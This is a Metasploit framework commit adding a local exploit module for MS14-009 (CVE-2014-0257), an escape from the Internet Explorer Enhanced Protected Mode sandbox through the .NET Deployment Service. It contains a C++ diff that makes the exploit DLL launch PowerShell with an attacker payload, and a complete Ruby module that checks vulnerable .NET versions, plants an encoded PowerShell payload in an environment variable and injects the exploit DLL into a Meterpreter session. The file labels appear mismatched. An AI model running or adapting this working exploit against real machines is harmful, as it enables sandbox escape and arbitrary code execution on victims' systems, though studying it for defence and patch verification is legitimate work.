Land rapid7#3404 - MS14-009 .NET Deployment Service IE Sandbox Escape

Author: wchen-r7

data/exploits/CVE-2014-0257/CVE-2014-0257.dll

@@ -165,8 +165,8 @@ void DoDfsvcExploit()
 				{
 					std::vector<variant_t> startArgs;
 
-					startArgs.push_back(L"mshta");
-					startArgs.push_back(GetEnv(L"MYURL"));
+					startArgs.push_back(L"powershell");
+					startArgs.push_back(GetEnv(L"PSHCMD"));
 
 					ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs);
 				}

external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp

@@ -0,0 +1,175 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = GreatRanking
+
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::FileInfo
+  include Msf::Post::File
+
+  NET_VERSIONS = {
+    '4.5' => {
+      'dfsvc' => '4.0.30319.17929.17',
+      'mscorlib' => '4.0.30319.18063.18'
+    },
+    '4.5.1' => {
+      'dfsvc' => '4.0.30319.18408.18',
+      'mscorlib' => '4.0.30319.18444.18'
+    }
+  }
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'		=> 'MS14-009 .NET Deployment Service IE Sandbox Escape',
+      'Description'	=> %q{
+        This module abuses a process creation policy in the Internet Explorer Sandbox which allows
+        to escape the Enhanced Protected Mode and execute code with Medium Integrity. The problem
+        exists in the .NET Deployment Service (dfsvc.exe), which can be run as Medium Integrity
+        Level. Further interaction with the component allows to escape the Enhanced Protected Mode
+        and execute arbitrary code with Medium Integrity.
+      },
+      'License'	=> MSF_LICENSE,
+      'Author'	=>
+        [
+          'James Forshaw', # Vulnerability Discovery and original exploit code
+          'juan vazquez' # metasploit module
+        ],
+      'Platform'	    => [ 'win' ],
+      'SessionTypes'	=> [ 'meterpreter' ],
+      'Targets'	=>
+        [
+          [ 'IE 8 - 11', { } ]
+        ],
+      'DefaultTarget' => 0,
+      'DefaultOptions'  =>
+        {
+          'WfsDelay' => 30
+        },
+      'DisclosureDate'=> "Feb 11 2014",
+      'References' =>
+        [
+          ['CVE', '2014-0257'],
+          ['MSB', 'MS14-009'],
+          ['BID', '65417'],
+          ['URL', 'https://github.com/tyranid/IE11SandboxEscapes']
+        ]
+    ))
+  end
+
+  def check
+    unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
+      return Exploit::CheckCode::Unknown
+    end
+
+    net_version = get_net_version
+
+    if net_version.empty?
+      return Exploit::CheckCode::Unknown
+    end
+
+    unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
+      return Exploit::CheckCode::Detected
+    end
+
+    mscorlib_version = get_mscorlib_version
+
+    if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"])
+      return Exploit::CheckCode::Safe
+    end
+
+    Exploit::CheckCode::Vulnerable
+  end
+
+  def get_net_version
+    net_version = ""
+
+    dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
+    dfsvc_version = dfsvc_version.join(".")
+
+    NET_VERSIONS.each do |k,v|
+      if v["dfsvc"] == dfsvc_version
+        net_version = k
+      end
+    end
+
+    net_version
+  end
+
+  def get_mscorlib_version
+    mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
+    mscorlib_version.join(".")
+  end
+
+  def exploit
+    print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil?
+
+    mod_handle = session.railgun.kernel32.GetModuleHandleA('iexplore.exe')
+    if mod_handle['return'] == 0
+      fail_with(Failure::NotVulnerable, "Not running inside an Internet Explorer process")
+    end
+
+    unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
+      fail_with(Failure::NotVulnerable, "Not running at Low Integrity")
+    end
+
+    print_status("Searching .NET Deployment Service (dfsvc.exe)...")
+
+    unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe")
+      fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found")
+    end
+
+    net_version = get_net_version
+
+    if net_version.empty?
+      fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1")
+    end
+
+    print_good(".NET Deployment Service from .NET #{net_version} found.")
+
+    print_status("Checking if .NET is patched...")
+
+    unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll")
+      fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)")
+    end
+
+    mscorlib_version = get_mscorlib_version
+
+    if Gem::Version.new(mscorlib_version) >= Gem::Version.new(NET_VERSIONS[net_version]["mscorlib"])
+      fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable")
+    end
+
+    print_good(".NET looks vulnerable, exploiting...")
+
+    cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip
+    session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd)
+
+    temp = get_env('TEMP')
+
+    print_status("Loading Exploit Library...")
+
+    session.core.load_library(
+        'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"),
+        'TargetFilePath'  => temp +  "\\CVE-2014-0257.dll",
+        'UploadLibrary'   => true,
+        'Extension'       => false,
+        'SaveToDisk'      => false
+    )
+  end
+
+  def cleanup
+    session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil)
+    super
+  end
+
+end
+